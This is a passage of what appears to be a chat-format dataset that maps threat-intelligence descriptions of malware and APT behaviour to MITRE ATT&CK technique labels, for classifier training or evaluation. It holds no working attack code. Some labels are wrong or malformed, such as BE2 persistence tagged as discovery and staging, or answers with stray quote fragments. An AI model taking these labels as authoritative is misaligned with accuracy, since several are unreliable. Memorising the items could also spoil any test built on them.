- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It’s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not."
- },
- {
- "role": "assistant",
- "content": "T1596.003 - Digital Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Nefilim ransomware downloads the Psexec.exe tool, and it also abuses the Windows built-in WMI (Windows Management Instrumentation) utility for lateral movement. PsExec is a free Microsoft tool that can be used to execute commands and binaries on remote systems and download or upload a file over a network share. Nefilim uses PsExec and WMI with hard-coded admin credentials to remotely execute the batch files and the ransomware file in remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their \"HKLM\\SYSTEM\\CurrentControlSet\\services\\\\[service_name]\\\\Start\" registry entries to value 4. It also deleted previously-created Image File Execution Options (IFEO) Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can execute PowerShell commands via WMI."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark can upload files to its C2."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used the post exploitation tool CrackMapExec to enumerate network shares."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SOMBRAT evades forensic analysis by patching the process memory used to record command line arguments. It replaces the initial command line with the base filename of the program executable, removing any arguments. This means that investigators that inspect a process listing via memory forensics will see the innocuous-looking command line `powershell.exe` rather than references to the uncommon filename such as `WwanSvc.c"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1564.010 - Process Argument Spoofing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can enumerate drives and their types. It can also change file permissions using cacls.exe."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Decrypted backdoor configuration Reverse analysis of TClient allowed us to determine how to decrypt the C&C information"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BE2 also uses start menu locations for persistence: UsersuserAppDataRoamingMicrosoftWindowsStart"
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery', 'T1036 - Masquerading', 'T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete used multiple compiled Python scripts on the victim’s system. Machete's main backdoor Machete is also written in Python."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron has a function to delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore has used Python scripts to execute payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron can collect files from a local system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "aggregates collected data in a tmp file."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Poseidon utilizes a variety of tools. Their main infection tool has been steadily evolving since 2005, with code remnants remaining the same to this day, while others have been altered to fit the requirements of new operating systems and specific campaigns. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used SMB for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark has stored information in folders named `U1` and `U2` prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used RDP sessions from public-facing systems to internal servers."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encodes communications to the C2 server in Base64."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use Window admin shares (C$ and ADMIN$) for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba can enumerate files by using a variety of functions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Threat Group-3390 tool can add the binary’s path to the Registry key \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" to add persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has established persistence using Userinit by adding the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon."
- },
- {
- "role": "assistant",
- "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BadPatch stores collected data in log files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The shellcode uses a 16-byte XOR key for decrypting the data as shown in Figure 10"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the payload execution it reaches out to the C2 via POST request as shown below"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some strings are obfuscated with XOR x56"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can use \"wmic process call create\" in a scheduled task to launch plugins and for execution."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects a list of users belonging to the local users and administrators groups with the commands \"net localgroup administrators\" and \"net localgroup users\"."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "exfiltrates data over the same channel used for C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can perform audio surveillance using microphones."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users."
- },
- {
- "role": "assistant",
- "content": "T1556.003 - Modify Authentication Process: Pluggable Authentication Modules"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has used an encrypted configuration file for its loader."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM can achieve persistence through the Registry Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has used Putty for remote access."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For early versions, the compilation timestamp was faked."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can decrypt downloaded payloads. Bazar also resolves strings and other artifacts at runtime."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naikon uses commands such as \"netsh advfirewall firewall\" to discover local firewall settings."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use \"net config workstation\", \"arp -a\", and \"ipconfig /all\" to gather network configuration information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINERACK can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "4H RAT uses HTTP for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the ransomware is not executed with administrator rights or if the infected host runs Windows Vista or later, it will attempt to elevate its privileges. In short, WastedLocker uses a well-documented UAC bypass method [1] [2]. It chooses a random file (EXE/DLL) from the Windows system32 folder and copies it to the %APPDATA% location under a different hidden filename. Next, it creates an alternate data stream (ADS) into the file named bin and copies the ransomware into it. WastedLocker then copies winsat.exe and winmm.dll into a newly created folder located in the Windows temporary folder"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used VPNs and Outlook Web Access (OWA) to maintain access to victim networks."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a specific port of 443 and can also use ports 53 and 80 for C2. One variant uses HTTP over port 443 to connect to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cryptoistic has the ability to send and receive files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 channel uses HTTP POST requests."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can sleep for 195 - 205 seconds after payload execution and before deleting its task."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit's \"New-UserPersistenceOption\" Persistence argument can be used to establish via a Scheduled Task/Job."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts some C2 traffic with the Blowfish cipher."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution."
- },
- {
- "role": "assistant",
- "content": "T1027.006 - HTML Smuggling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious can delete files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors collected data from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "admin@338 has sent emails with malicious Microsoft Office documents attached."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mythic provides various transform functions to encode and/or randomize C2 data."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to list account information on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can support C2 communications over DNS."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBStealer mimics a legitimate Russian program called USB Disk Security."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These platforms are used to exfiltrate documents and receive instructions. Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are hardcoded within the sample"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pillowmint has used the NtQueueApcThread syscall to inject code into svchost.exe."
- },
- {
- "role": "assistant",
- "content": "T1055.004 - Process Injection: Asynchronous Procedure Call"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts several of its files, including configuration files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using the mv command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker downloads an HTTP server to the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A macro is executed by the Office document: The macro inflates and creates a ZIP file on the targeted system and executes a Lua script in this archive. The archive contains the Lua payload and luajit, a Lua interpreter for Windows. Here is the script: This script downloads and executes an additional payload"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the past we have seen others techniques that used Bitcoin blockchain to hide their C&C server IP address, but in this blog we will share an analysis of the new technique"
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can enumerate directories on target machines."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook is capable of spawning a Windows command shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Creates events \"__klg__\" and \"__klgkillsoft__\" to act as mutexes and facilitate self-removal. Installs itself to %APPDATA%\\Intel Corporation\\IAStorIcon.exe. Creates an entry in the user's Startup folder for persistence. Uses the SetWindowsHookExW API function to capture keystrokes system-wide. Formats and writes the keylogger output to %APPDATA%\\Update\\Tmp\\k%d.txt, where %d is the current system tick count"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro has been used to execute \"net view\" on a targeted system."
- },
- {
- "role": "assistant",
